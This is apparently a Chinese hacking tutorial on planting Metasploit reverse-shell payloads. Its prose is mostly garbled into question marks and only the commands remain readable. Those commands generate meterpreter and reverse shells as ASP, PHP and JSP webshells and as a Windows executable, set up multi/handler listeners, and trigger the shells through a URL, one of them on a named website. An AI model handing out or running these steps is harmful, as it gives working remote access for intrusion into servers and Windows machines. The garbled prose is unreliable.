????Metasploit ???msfpayload ??msfencode ????????????????????????????????exe ??????????????????????????webshell ?????????webshell ??????ü???????????webshell??url??????????????????session????????????á?
?????????????????÷?????
??????????????????msf???payload ???????λ?????????μ?????????????webshell??????????msfpayload???÷????????????????????????????????????
????????webshell
????msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
?????????webshell????????????????????????????????
??????????msfconsole
????????
????use exploit/multi/handler??
????set PAYLOAD windows/meterpreter/reverse_tcp(?????payload???????msfpayload?????????????
????set LHOST your_ip
????exploit
??????????webshell??url?????????curl ????curl http://host/webshell.asp ?????exploit??г????????????msfconsole???з???meterpreter shell??
?????????????netbox ??asp??????????г??????????????????????????????á? ???????????asp??webshell ????????php webshell??jsp webshell ?????msfencode???-t ????????????????????php?????webshell??????????
??????????????????????п??????????????????????????????????????msfpayload?????????????ü??????????к???????????session???session??meterpreter?????????????????meter??????????????????裺???????????????????
????1??msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.131 LPORT=4444 X >/root/cracer.exe
????2????msfconsole ?????????terminate????
????3?????ü?????????????????????????????????
????use exploit/multi/handler??set PAYLOAD windows/meterpreter/reverse_tcp??set LHOST=your_ip??set LPORT 4444?????exploit
????4????test.exe ???????????
????5??????????????test.exe ??????????shell???
????6????windows shell ??? meterpreter shell??????????payload??shell_reverse_tcp???????????????????shell??????????????????????????windows shell??windows ?????????)???????????meterpreter shell??????????????????? ????Ctrl + z ? windows shell ??????У????sessions ???? shell ??session?????
???????????? sessions -u number??number????????windows shell session????????????????meterpreter shell??????????meterpreter??????????п???????????????????????????????google????
???????????Щ????????????????????exe???????????msf?????????????????????????????????????msf ???и?????Meterpreter??
??????????????????????????payloads?е?payloads ?????????????????????
??????LINUX????????????.??????????????? ???MSF ..
????1 .????WEBSHELL???
????msf > msfpayload php/reverse_php LHOST=???IP LPORT=??? R > dis9.php
???????BT4????/ROOT/ ?? ????dis9.php?? ????????
??????dis9.php???????SHELL?? ???? www.dis9.com/dis9.php
????2 . ???MSF???y?????????
????msf > use multi/handler //???? multi/handler ???
????msf exploit(handler) > set PAYLOAD php/reverse_php //д????? ???????????? info php/reverse_php ????????
????msf exploit(handler) > set LHOST ???IP //????dis9.php??LHOST??IP ??????IP ????
????msf exploit(handler) > set LPORT 8080 //???
????msf exploit(handler) > exploit //???
????3.????SHELL
?????????????dis9.php
????root@bt4:linkswww.dis9.com/dis9.php
???????????????SHELL
??????????????FUCK ALL
????///////////////////////////////////////////////////////////////////////////////////////////////// JSP
????msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > balckrootkit.jsp
????msf > use exploit/multi/handler
????msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
????set PAYLOAD java/jsp_shell_reverse_tcp
????msf exploit(handler) > set LHOST 192.168.10.1
????LHOST => 192.168.10.1
????——————————————————- ?????SET??? ????4444